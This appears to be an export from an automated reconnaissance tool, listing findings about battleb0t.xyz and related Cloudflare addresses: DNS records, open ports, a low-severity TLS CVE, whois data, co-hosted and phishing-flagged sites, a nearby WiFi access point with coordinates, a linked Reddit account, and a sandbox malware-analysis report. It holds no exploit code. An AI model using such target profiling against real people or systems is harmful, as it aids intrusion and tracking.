Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57adae9fbb90f2-FRA
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:55:05 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T00:44:58.534Z", "ip": "188.114.97.1", "location_updated_at": "2023-04-29T21:54:15.361063Z", "autonomous_system_updated_at": "2023-04-29T21:54:15.361178Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "A", "resolved_at": "2023-04-22T14:40:02.799652037Z"}, "landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "en.jahanbaygan.com": {"record_type": "A", "resolved_at": "2022-12-02T13:39:13.675188752Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-04-18T20:54:02.995698546Z"}, "stafferty.lt": {"record_type": "A", "resolved_at": "2022-11-13T15:02:07.210831297Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2023-04-10T16:35:40.386710867Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "question-orthographe.net": {"record_type": "A", "resolved_at": "2022-12-25T11:23:33.248567488Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "www.alvandcenter.com": {"record_type": "A", "resolved_at": "2022-11-07T12:46:16.283141371Z"}, "www.les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-12T13:36:36.298008873Z"}, "web3rh.tk": {"record_type": 
"A", "resolved_at": "2023-02-20T04:15:37.204816270Z"}, "cisp.su": {"record_type": "A", "resolved_at": "2023-05-03T21:53:16.954543221Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2023-01-11T15:16:43.150193914Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-26T15:24:28.844795223Z"}, "www.mrandmrsdesousa.co.uk": {"record_type": "A", "resolved_at": "2023-01-03T16:16:24.443812711Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "finalsfootyfantasy.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:32.701218324Z"}, "inthemachine.com.au": {"record_type": "A", "resolved_at": "2023-04-15T12:22:39.481058126Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "www.irancamping.com": {"record_type": "A", "resolved_at": "2022-10-13T13:47:56.298914617Z"}, "emberstreet.rocks": {"record_type": "A", "resolved_at": "2023-05-01T02:31:05.910468718Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "bezi386.xyz": {"record_type": "A", "resolved_at": "2023-03-16T01:18:53.784985236Z"}, "www.vitanco.com.mx": {"record_type": "A", "resolved_at": "2023-04-23T18:35:54.572453429Z"}, "stafferty.lv": {"record_type": "A", "resolved_at": "2022-11-12T15:01:01.637935320Z"}, "www.otherend.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:39.580563012Z"}, "clinic.tanyar.org": {"record_type": "A", "resolved_at": "2023-05-07T21:19:52.237134340Z"}, "oscord.net": {"record_type": "A", "resolved_at": "2023-05-07T20:04:57.891682634Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2023-04-28T14:34:55.423339504Z"}, "irancamping.com": {"record_type": "A", "resolved_at": "2022-10-07T10:43:58.475530009Z"}, 
"www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "www.oxinpc.ir": {"record_type": "A", "resolved_at": "2022-10-09T15:06:46.974209710Z"}, "www.ostrovok.net": {"record_type": "A", "resolved_at": "2023-05-07T20:05:01.309575808Z"}, "centrumpedikury.sk": {"record_type": "A", "resolved_at": "2022-10-02T16:33:19.851015297Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2023-05-01T20:11:56.835607536Z"}, "dubuy.dk": {"record_type": "A", "resolved_at": "2023-05-04T17:27:40.171255307Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2023-01-21T13:35:04.083346865Z"}, "compete.pics": {"record_type": "A", "resolved_at": "2023-05-03T21:18:20.511512892Z"}, "karriere-job-booster.at": {"record_type": "A", "resolved_at": "2023-04-12T21:48:57.147456694Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "fi.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-05-01T14:32:55.216085423Z"}, "assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "oytunjivillage.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:58.523823601Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2023-03-30T19:32:04.069794297Z"}, "ftp.netrobotic.ir": {"record_type": "A", "resolved_at": "2023-04-04T18:41:04.300955582Z"}, "faryabkhabar.ir": {"record_type": "A", "resolved_at": "2022-12-17T14:50:17.458081363Z"}, "de.helsinkicard.com": {"record_type": "A", "resolved_at": "2023-04-28T15:19:37.298278045Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2023-04-24T14:59:01.147426415Z"}, "les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-11T03:19:20.280901310Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "diacounneirepuhar.ml": {"record_type": "A", 
"resolved_at": "2023-02-18T02:32:50.074200205Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "e-rundev.ir": {"record_type": "A", "resolved_at": "2023-05-07T17:49:10.633989137Z"}, "ectasy.wtf": {"record_type": "A", "resolved_at": "2023-05-05T04:39:30.020839530Z"}, "hola.organizoo.net": {"record_type": "A", "resolved_at": "2023-05-07T20:03:38.886997403Z"}, "pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2023-04-20T12:15:33.428852719Z"}, "odenneszolaca.cf": {"record_type": "A", "resolved_at": "2023-02-17T02:27:33.470439994Z"}}, "names": ["www.clinic.tanyar.org", "beautybeyondhair.buzz", "bezi386.xyz", "api.snoor.shop", "mail.mardinscarf.com", "compete.pics", "les1000volets.com", "megafrica.ao", "www.oxinpc.ir", "demo.jamalghamari.com", "cisp.su", "emberstreet.rocks", "total-ev-charge.com", "dl.jamalghamari.com", "inthemachine.com.au", "lt.makingprojec.com", "irancamping.com", "stafferty.lv", "www.wolny.poker", "barbecue-masters.dk", "stafferty.lt", "www.shop.charkhak.ir", "barbecuemasters.dk", "question-orthographe.net", "smtp.sharoshop.com", "www.mrandmrsdesousa.co.uk", "ftp.netrobotic.ir", "www.ostrovok.net", "oytunjivillage.net", "edu.rabinia.com", "ritta.app", "ftp.baharelm.ir", "landing.makingprojec.com", "www.irancamping.com", "wolny.poker", "e-rundev.ir", "web3rh.tk", "beautybeyondhair.net", "uncoveryourconfidence.org", "mybots.amirhsvip.ir", "www.vitanco.com.mx", "mail.lskala.com", "www.les1000volets.com", "faryabkhabar.ir", "finalsfootyfantasy.com.au", "ectasy.wtf", "assistant.amirhsvip.ir", "karriere-job-booster.at", "www.barbecue-masters.dk", "karriere-job-booster.com", "centrumpedikury.sk", "odenneszolaca.cf", "www.sanayepishro.com", "www.barbecuemasters.dk", "clinic.tanyar.org", "dubuy.dk", "mail.wolny.poker", 
"www.otherend.net", "hola.organizoo.net", "pop.makingprojec.com", "oscord.net", "diacounneirepuhar.ml", "en.jahanbaygan.com", "fi.helsinkicard.com", "www.alvandcenter.com", "mail.bokharsanat.com", "de.helsinkicard.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://188.114.97.1/"}, "response": {"body": "<!DOCTYPE html>\n<!--[if lt IE 7]> <html class=\"no-js ie6 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 7]> <html class=\"no-js ie7 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 8]> <html class=\"no-js ie8 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if gt IE 8]><!--> <html class=\"no-js\" lang=\"en-US\"> <!--<![endif]-->\n<head>\n<title>Direct IP access not allowed | Cloudflare</title>\n<meta charset=\"UTF-8\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n<meta name=\"robots\" content=\"noindex, nofollow\" />\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\" />\n<link rel=\"stylesheet\" id=\"cf_styles-css\" href=\"/cdn-cgi/styles/main.css\" />\n\n\n<script>\n(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById(\"error-feedback-survey\"),d=document.getElementById(\"error-feedback-success\"),b=new XMLHttpRequest;a={event:\"feedback 
clicked\",properties:{errorCode:1003,helpful:a,version:1}};b.open(\"POST\",\"https://sparrow.cloudflare.com/api/v1/event\");b.setRequestHeader(\"Content-Type\",\"application/json\");b.setRequestHeader(\"Sparrow-Source-Key\",\"c771f0e4b54944bebf4261d44bd79a1e\");\nb.send(JSON.stringify(a));c.classList.add(\"feedback-hidden\");d.classList.remove(\"feedback-hidden\")};document.addEventListener(\"DOMContentLoaded\",function(){var a=document.getElementById(\"error-feedback\"),c=document.getElementById(\"feedback-button-yes\"),d=document.getElementById(\"feedback-button-no\");\"classList\"in a&&(a.classList.remove(\"feedback-hidden\"),c.addEventListener(\"click\",function(){e(!0)}),d.ad | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Bikemap (Category: health)
https://www.bikemap.net/en/u/login/routes/created/ | login |
| 2023-05-12 03:03:27 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nwapi.battleb0t.xyz |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi2.battleb0t.xyz | [{"url": "https://nwapi2.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi2.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [akashpmani.github.io]
https://www.openphish.com/feed.txt | akashpmani.github.io |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-fog.github.io |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 1 | 0 | None | text/html;charset=utf-8 | ayhu.xyz |
| 2023-05-12 03:09:59 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | amcodev.me | stage-sdb-n1-fra1.amcodev.me |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6041aa868cdc-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:8080 | 188.114.96.0/24 |
| 2023-05-12 03:12:16 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Copyright (c)2023 by NIC.AT (1)
%
% Restricted rights.
%
% Except for agreed Internet operational purposes, no part of this
% information may be reproduced, stored in a retrieval system, or
% transmitted, in any form or by any means, electronic, mechanical,
% recording, or otherwise, without prior permission of NIC.AT on behalf
% of itself and/or the copyright holders. Any use of this material to
% target advertising or similar activities is explicitly forbidden and
% can be prosecuted.
%
% It is furthermore strictly forbidden to use the Whois-Database in such
% a way that jeopardizes or could jeopardize the stability of the
% technical systems of NIC.AT under any circumstances. In particular,
% this includes any misuse of the Whois-Database and any use of the
% Whois-Database which disturbs its operation.
%
% Should the user violate these points, NIC.AT reserves the right to
% deactivate the Whois-Database entirely or partly for the user.
% Moreover, the user shall be held liable for any and all damage
% arising from a violation of these points.
domain: beatrixhaller.at
registrar: easyname GmbH ( https://nic.at/registrar/414 )
registrant: <data not disclosed>
tech-c: <data not disclosed>
nserver: ns1.easyname.eu
nserver: ns2.easyname.eu
changed: 20220307 12:53:33
source: AT-DOM
| beatrixhaller.at |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:80 | 188.114.96.1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | JDKolgen (Net ID: 00:0C:F6:CC:40:31) | 50.8897, 6.0563 |
| 2023-05-12 02:53:32 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.0/24 | 185.199.111.153 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00arthur00.github.io | 185.199.111.153 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 4 | 0 | None | GitHub.com | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:45:56 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:57:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.vrcarena.com/species/dQLXfvdRHnc8JmSFeTy1/avatar', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "142.251.211.234:443"\n "142.251.215.232:443"\n "142.250.217.99:443"\n "52.85.247.97:443"\n "142.250.69.206:443"\n "104.18.27.135:443"\n "52.85.247.24:443"\n "54.230.18.97:443"\n "104.244.42.200:443"\n "142.250.217.80:443"\n "52.85.247.96:443"\n "104.46.162.224:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6844:120:WilError_01"\n "Local\\SM0:6596:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:6596:120:WilError_01"\n "Local\\SM0:6844:304:WilStaging_02"\n "Local\\SM0:6844:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6844:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4044:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\6844_544713811\\Part-RU]- [targetUID: 00000000-00006844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006844]\n "f_00023e" has type "gzip compressed data last modified: Wed Nov 2 19:43:37 2022 from Unix original size modulo 2^32 98857"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006844]\n "84e68c01236e4db9_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\84e68c01236e4db9_0]- [targetUID: 00000000-00006844]\n "c36ee6c5c3d6defa_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\c36ee6c5c3d6defa_0]- [targetUID: 00000000-00006844]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00006844]\n "4c619ea7-d902-43ed-b735-14327b833f02.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4c619ea7-d902-43ed-b735-14327b833f02.tmp]- [targetUID: 00000000-00006844]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\shopping_iframe_driver.js]- [targetUID: 00000000-00006844]\n "96de8815-40a5-4b15-9b75-d58711f01a5f.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\96de8815-40a5-4b15-9b75-d58711f01a5f.tmp]- [targetUID: 00000000-00006844]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 50230"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00006896]\n "3cec8455-ee81-40cf-a112-d3662d1d59c2.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3cec8455-ee81-40cf-a112-d3662d1d59c2.tmp]- [targetUID: 00000000-00006896]\n "4491cd861a319b67_0" has type "data"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\shopping.js]- [targetUID: 00000000-00006844]\n "c0110775-0c41-4f39-bee8-7b05c4fac42c.tmp" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6844_2131939810\\auto_open_controller.js]- [targetUID: 00000000-00006844]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\6844_2018864076\\deny_domains.list]- [targetUID: 00000000-00006844]\n "ec03c6bc0dd41943_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\ec03c6bc0dd41943_0]- 
[targetUID: 00000000-00006844]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\WebStorage\\QuotaManager-journal]- [targetUID: 00000000-00006844]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\6844_544713811\\Part-NL]- [targetUID: 00000000-00006844]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006844]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.vrcarena.com/species/dQLXfvdRHnc8JmSFeTy1/avatar"\n Pattern match: "https://www.vrcarena.com"\n Heuristic match: "_11__vlcarena.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\6844_2131939810\\shopping_iframe_driver.js]- [targetUID: 00000000-00006844]\n Dropped file: "shopping.js" - Location: [%TEMP%\\6844_2131939810\\shopping.js]- [targetUID: 00000000-00006844]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\6844_2131939810\\auto_open_controller.js]- [targetUID: 00000000-00006844]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\6844_2131939810\\shoppingfre.js]- [targetUID: 00000000-00006844]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006844]\n Dropped file: 
"edge_tracking_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_tracking_page_validator.js]- [targetUID: 00000000-00006844]\n Dropped file: "product_page.js" - Location: [%TEMP%\\6844_2131939810\\product_page.js]- [targetUID: 00000000-00006844]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\6844_544713811\\adblock_snippet.js]- [targetUID: 00000000-00006844]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\6844_2131939810\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\6844_544713811\\Part-RU]- [targetUID: 00000000-00006844]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-12250267518\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE6-28199932469\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\1f4ff203-90ab-4416-938f-e487c16d6306" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-28209209127\n 
"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE6-42546228845\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EntityExtraction" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00006844-00000BE4-80289175563\n "C:\\Users\\HAPUBWS\\AppData\\Local | 34.148.97.127 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.182): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-tikaro.github.io |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/battleb0t | battleb0t |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000.lt | 185.199.111.153 |
| 2023-05-12 03:35:41 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'LI', u'country_tld': u'.nl', u'ip': u'45.131.109.53', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Eygelshoven', u'network': u'45.131.109.0/24', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 50.8897, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'SYNLINQ', u'postal': u'6471', u'asn': u'AS44486', u'country': u'NL', u'region': u'Limburg', u'longitude': 6.0563, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | 45.131.109.53 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.225): Search Engine
Last Activity: 0 days ago
